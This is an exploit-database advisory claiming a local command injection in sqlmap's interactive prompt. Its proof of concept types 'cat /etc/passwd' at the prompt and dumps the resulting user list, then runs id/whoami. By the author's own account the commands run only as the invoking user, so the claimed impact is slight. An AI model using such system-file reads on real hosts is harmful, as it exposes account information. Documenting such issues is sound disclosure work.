SQLmap - Command Injection

2020.02.11
fr Mizaru (FR) fr
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: SQLmap - Command Injection # Google Dork: Nope :( # Date: 20 January 16:02 # Author: Mizaru # Vendor Homepage: https://sqlmap.org # Software Link: https://github.com/sqlmapproject/sqlmap # Version: Last Version # Tested on: ParrotSec & Windows 10 # CVE : Nope :( The vulnerability happend when you want to choose an option Yes, the sqlmap program execute command. PoC: -> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] lol -> bash: lol : commande introuvable If you understand french langage, you see that the program execute an bash command. So if we test to do an real command, what happen ? -> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:104:109:MySQL Server,,,:/nonexistent:/bin/false freerad:x:105:110::/etc/freeradius:/usr/sbin/nologin Debian-exim:x:106:111::/var/spool/exim4:/usr/sbin/nologin debian-tor:x:107:112::/var/lib/tor:/bin/false uuidd:x:108:115::/run/uuidd:/usr/sbin/nologin rwhod:x:109:65534::/var/spool/rwho:/usr/sbin/nologin redsocks:x:110:116::/var/run/redsocks:/usr/sbin/nologin shellinabox:x:111:117:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin postgres:x:112:118:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin redis:x:114:120::/var/lib/redis:/usr/sbin/nologin miredo:x:115:65534::/var/run/miredo:/usr/sbin/nologin ntp:x:116:121::/nonexistent:/usr/sbin/nologin stunnel4:x:117:122::/var/run/stunnel4:/usr/sbin/nologin dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin messagebus:x:119:123::/nonexistent:/usr/sbin/nologin iodine:x:120:65534::/var/run/iodine:/usr/sbin/nologin arpwatch:x:121:125:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh sslh:x:122:130::/nonexistent:/usr/sbin/nologin sshd:x:123:65534::/run/sshd:/usr/sbin/nologin rtkit:x:124:131:RealtimeKit,,,:/proc:/usr/sbin/nologin avahi:x:125:133:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin inetsim:x:126:134::/var/lib/inetsim:/usr/sbin/nologin gluster:x:127:136::/var/lib/glusterd:/usr/sbin/nologin colord:x:128:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin saned:x:129:139::/var/lib/saned:/usr/sbin/nologin geoclue:x:130:141::/var/lib/geoclue:/usr/sbin/nologin pulse:x:131:142:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin king-phisher:x:132:145::/var/lib/king-phisher:/usr/sbin/nologin lightdm:x:133:146:Light Display Manager:/var/lib/lightdm:/bin/false dradis:x:134:147::/var/lib/dradis:/usr/sbin/nologin beef-xss:x:135:148::/var/lib/beef-xss:/usr/sbin/nologin i2psvc:x:136:149::/var/lib/i2p:/usr/sbin/nologin l0uky:x:1000:1000:0xL0uky,,,:/home/l0uky:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/sbin/nologin But we can do an id/whoami for see what user we execute this command -> uid=1000(l0uky) gid=1000(l0uky) groupes=1000(l0uky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),135(scanner) So you can see, the command was execute with the user who executed sqlmap :) Not too dangerous but must be patched


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top